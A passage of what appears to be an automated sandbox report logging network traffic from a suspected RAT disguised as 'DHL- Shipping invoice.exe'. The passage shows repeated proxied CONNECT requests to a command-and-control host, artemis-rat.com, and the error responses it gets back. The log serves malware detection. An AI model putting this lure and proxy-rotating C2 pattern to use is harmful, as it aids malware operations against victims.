                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:04 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1260192.168.2.453078117.160.250.13188996484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.540244102 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.562398911 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.018465996 CET303INHTTP/1.1 400 Bad Request
                            Server: openresty
                            Date: Tue, 12 Mar 2024 07:37:05 GMT
                            Content-Type: text/html
                            Content-Length: 154
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1261192.168.2.453851104.18.44.93806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.540632010 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.628750086 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:04 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1262192.168.2.453138117.160.250.16388286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.540781975 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.952712059 CET221INHTTP/1.1 403 Access Denied
                            Date: Tue, 12 Mar 2024 07:37:04 GMT
                            Connection: close
                            Cache-Control: no-store
                            Content-Type: text/html
                            Content-Language: en
                            Content-Length: 43
                            Data Raw: 59 6f 75 20 61 72 65 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 74 6f 20 61 63 63 65 73 73 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 2e
                            Data Ascii: You are not allowed to access the document.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1263192.168.2.453806166.62.121.102458866484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.541558027 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1264192.168.2.45379782.113.157.122312806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.543056965 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1265192.168.2.453750103.86.109.38806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.543087959 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1266192.168.2.45380351.158.76.35163796484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.543292999 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.046889067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.590316057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.750308990 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:08.816112041 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:09.786119938 CET729INHTTP/1.0 501 Tor is not an HTTP Proxy
                            Content-Type: text/html; charset=iso-8859-1
                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69 67 75 72 65 20 79 6f 75 72 20 63 6c 69 65 6e 74 20 61 63 63 6f 72 64 69 6e 67 6c 79 2e 0a 3c 2f 70 3e 0a 3c 70 3e 0a 53 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 22 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 3c 2f 61 3e 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 00
                            Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.</p></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1267192.168.2.453484192.252.216.8141456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.547689915 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1268192.168.2.453791161.97.173.42271726484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.547692060 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1269192.168.2.453810107.173.146.53156736484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.550000906 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1270192.168.2.453798162.144.79.97595596484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.551503897 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1271192.168.2.453902104.16.81.76806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.551733017 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.638598919 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:04 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1272192.168.2.453748103.231.45.14510806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.552093983 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.453028917 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1273192.168.2.452005185.18.198.163381886484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.552385092 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1274192.168.2.453826159.65.77.16885856484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.553131104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1275192.168.2.45381480.13.43.193806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.554024935 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.046950102 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.590348005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.750335932 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:08.941581964 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:11.140981913 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:13.250171900 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:17.453248978 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:25.953056097 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1276192.168.2.453291194.247.173.1780806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.554265022 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.640758991 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1277192.168.2.453824177.234.245.249322136484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.554404020 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.062599897 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1278192.168.2.45382394.131.14.6610816484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.566052914 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1279192.168.2.45207066.70.225.20280506484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.566483974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.640793085 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:10.750193119 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:16.843835115 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:28.952914953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:40.953005075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1280192.168.2.45386251.15.247.93163796484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.572561026 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.062597990 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.562990904 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.563083887 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:08.563364983 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:10.563369036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:12.562720060 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:16.562697887 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:19.537656069 CET536INHTTP/1.0 501 Tor is not an HTTP Proxy
                            Content-Type: text/html; charset=iso-8859-1
